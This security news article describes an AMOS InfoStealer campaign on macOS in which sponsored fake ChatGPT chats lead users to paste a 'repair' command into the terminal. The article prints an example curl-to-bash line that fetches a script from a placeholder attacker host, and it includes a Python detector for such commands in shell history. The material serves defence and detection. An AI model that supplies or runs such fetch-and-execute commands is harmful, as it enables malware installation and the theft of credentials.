Threat Actors Leverage ChatGPT to Attack Mac Devices With AMOS InfoStealer

A new AMOS InfoStealer campaign is abusing trust in ChatGPT to infect Mac devices under the guise of simple troubleshooting help.

Victims search for a fix to a sound problem, click a sponsored ChatGPT result, and are shown what looks like a normal chat session.

The chat then returns a “repair” command and tells the user to run it in the macOS terminal.

Google Chrome browsing history extract from an infected Mac device (Source: KROLL)

The attack blends social engineering and technical abuse in a way that feels routine to users. There is no fake installer window or obvious phishing page.

Instead, the victim follows what appears to be a normal support flow in a well-known AI chat interface. KROLL security researchers identified that this flow was used to deploy AMOS InfoStealer on targeted Mac endpoints.

The KROLL team detected that the lure is pushed using Google Ads, which place the malicious ChatGPT session at the top of search results. The domain shown is legitimate, which makes it even harder for a normal user to spot the risk.

Once the user trusts the chat, a single copy‑paste operation in the terminal is sufficient to compromise the system.

ChatGPT instructions shown to the user (Source: KROLL)

The impact is serious for both home users and companies. AMOS InfoStealer is built to harvest browser data, credentials, session cookies, and other stored secrets from the infected Mac.

Stolen data can then be reused for account takeover, lateral movement, or sale on underground markets.

Infection Mechanism and Malicious Command Execution

KROLL analysts traced the initial infection to a terminal command given by the fake ChatGPT chat, which acts as an indicator of compromise.

The command tells macOS to download and run a remote script, a pattern that aligns with MITRE ATT&CK techniques for user execution and ingress tool transfer.

A typical malicious pattern looks like this:

curl -s https://attacker-example[.]com/installer.sh | bash

When executed, this one‑line command pulls a shell script over HTTPS, saves nothing visible to the user, and runs the script in the same terminal session. The script can then install AMOS, set up persistence, and start data theft.
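The pattern above is easy to hunt for in shell history or process command-line telemetry. The following detector is an added example for this article, not code from KROLL or the report; it flags both the pipe form (`curl ... | bash`) and the command-substitution form (`sh -c "$(curl ...)"`), and the sample history and the `attacker-example.invalid` domain are constructed placeholders.

```python
import re
from typing import List, Optional, Tuple

# A download tool followed by its arguments, stopping at any shell operator.
_DOWNLOADER = r"(?:curl|wget)\b[^|;&\n]*"
# Form 1: curl/wget output piped straight into a shell (optionally via sudo).
_PIPE_TO_SHELL = re.compile(
    _DOWNLOADER + r"\|\s*(?:sudo\s+)?(?:ba|z|k)?sh\b", re.IGNORECASE)
# Form 2: a shell asked to run the result of a download, e.g. zsh -c "$(curl ...)".
_SUBST_TO_SHELL = re.compile(
    r"\b(?:ba|z|k)?sh\b[^\n]*-c\s+[\"']?\$\(\s*" + _DOWNLOADER + r"\)",
    re.IGNORECASE)
_URL = re.compile(r"https?://[^\s'\"|)]+", re.IGNORECASE)


def is_pipe_to_shell(cmdline: str) -> bool:
    """True when a command line downloads content and hands it to a shell."""
    return bool(_PIPE_TO_SHELL.search(cmdline) or _SUBST_TO_SHELL.search(cmdline))


def extract_url(cmdline: str) -> Optional[str]:
    """First URL in the command line, used as the indicator to pivot on."""
    m = _URL.search(cmdline)
    return m.group(0) if m else None


def scan_history(lines: List[str]) -> List[Tuple[int, Optional[str], str]]:
    """Return (line_no, url, command) for every suspicious history entry."""
    hits = []
    for n, line in enumerate(lines, 1):
        # zsh extended history stores entries as ": <epoch>:<secs>;<command>".
        cmd = line.split(";", 1)[1] if line.startswith(": ") and ";" in line else line
        if is_pipe_to_shell(cmd):
            hits.append((n, extract_url(cmd), cmd.strip()))
    return hits


# Constructed sample of a ~/.zsh_history; the domain is a placeholder.
SAMPLE_HISTORY = """\
: 1717000000:0;ls -la ~/Downloads
: 1717000030:0;brew update
: 1717000090:0;curl -s https://attacker-example.invalid/installer.sh | bash
: 1717000120:0;zsh -c "$(curl -fsSL https://attacker-example.invalid/fix.sh)"
: 1717000150:0;curl -o report.csv https://internal.example/report.csv
""".splitlines()

if __name__ == "__main__":
    for n, url, cmd in scan_history(SAMPLE_HISTORY):
        print(f"line {n}: remote script executed by shell, fetched from {url}: {cmd}")
```

The same `is_pipe_to_shell` check can be applied to the command-line field of EDR or unified-log process events, where the parent process being a terminal or browser-launched shell is the extra context worth alerting on.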
